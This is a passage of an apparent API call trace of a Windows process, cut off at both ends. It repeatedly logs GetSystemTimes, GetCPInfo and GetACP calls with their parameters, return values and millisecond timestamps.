lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.367] GetACP () returned 0x4e4 [0077.367] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.367] GetACP () returned 0x4e4 [0077.367] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.367] GetACP () returned 0x4e4 [0077.367] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.368] GetACP () returned 0x4e4 [0077.368] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.368] GetACP () returned 0x4e4 [0077.368] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.368] GetACP () returned 0x4e4 [0077.368] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.368] GetACP () returned 0x4e4 [0077.368] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.369] GetACP () returned 0x4e4 [0077.369] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.369] GetACP () returned 0x4e4 [0077.369] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.369] GetACP () returned 0x4e4 [0077.369] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.369] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.369] GetACP () returned 0x4e4 [0077.369] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.370] GetACP () returned 0x4e4 [0077.370] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.370] GetACP () returned 0x4e4 [0077.370] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.370] GetACP () returned 0x4e4 [0077.370] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.370] GetACP () returned 0x4e4 [0077.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.371] GetACP () returned 0x4e4 [0077.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.371] GetACP () returned 0x4e4 [0077.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.371] GetACP () returned 0x4e4 [0077.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.371] GetACP () returned 0x4e4 [0077.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.372] GetACP () returned 0x4e4 [0077.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.372] GetACP () returned 0x4e4 [0077.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.372] GetACP () returned 0x4e4 [0077.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.373] GetACP () returned 0x4e4 [0077.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.373] GetACP () returned 0x4e4 [0077.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.373] GetACP () returned 0x4e4 [0077.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.373] GetACP () returned 0x4e4 [0077.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.374] GetACP () returned 0x4e4 [0077.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.374] GetACP () returned 0x4e4 [0077.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.374] GetACP () returned 0x4e4 [0077.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.374] GetACP () returned 0x4e4 [0077.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.375] GetACP () returned 0x4e4 [0077.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.375] GetACP () returned 0x4e4 [0077.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.375] GetACP () returned 0x4e4 [0077.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.375] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.375] GetACP () returned 0x4e4 [0077.375] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.376] GetACP () returned 0x4e4 [0077.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.376] GetACP () returned 0x4e4 [0077.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.376] GetACP () returned 0x4e4 [0077.376] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.376] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.376] GetACP () returned 0x4e4 [0077.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.377] GetACP () returned 0x4e4 [0077.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.377] GetACP () returned 0x4e4 [0077.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.377] GetACP () returned 0x4e4 [0077.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.377] GetACP () returned 0x4e4 [0077.377] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.377] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.378] GetACP () returned 0x4e4 [0077.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.378] GetACP () returned 0x4e4 [0077.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.378] GetACP () returned 0x4e4 [0077.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.378] GetACP () returned 0x4e4 [0077.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.378] GetACP () returned 0x4e4 [0077.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.378] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.378] GetACP () returned 0x4e4 [0077.378] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.379] GetACP () returned 0x4e4 [0077.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.379] GetACP () returned 0x4e4 [0077.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.379] GetACP () returned 0x4e4 [0077.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.379] GetACP () returned 0x4e4 [0077.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.379] GetACP () returned 0x4e4 [0077.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.379] GetACP () returned 0x4e4 [0077.379] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.379] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.380] GetACP () returned 0x4e4 [0077.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.380] GetACP () returned 0x4e4 [0077.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.380] GetACP () returned 0x4e4 [0077.380] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.380] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.437] GetACP () returned 0x4e4 [0077.437] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.437] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.437] GetACP () returned 0x4e4 [0077.437] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.437] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.437] GetACP () returned 0x4e4 [0077.437] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.438] GetACP () returned 0x4e4 [0077.438] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.438] GetACP () returned 0x4e4 [0077.438] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.438] GetACP () returned 0x4e4 [0077.438] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.438] GetACP () returned 0x4e4 [0077.438] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.438] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.438] GetACP () returned 0x4e4 [0077.438] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.439] GetACP () returned 0x4e4 [0077.439] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.439] GetACP () returned 0x4e4 [0077.439] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.439] GetACP () returned 0x4e4 [0077.439] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.439] GetACP () returned 0x4e4 [0077.439] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.439] GetACP () returned 0x4e4 [0077.439] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.439] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.439] GetACP () returned 0x4e4 [0077.439] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.440] GetACP () returned 0x4e4 [0077.440] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.440] GetACP () returned 0x4e4 [0077.440] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.440] GetACP () returned 0x4e4 [0077.440] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.440] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0077.440] GetACP () returned 0x4e4 [0077.440] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0077.440] GetCPInfo (in: 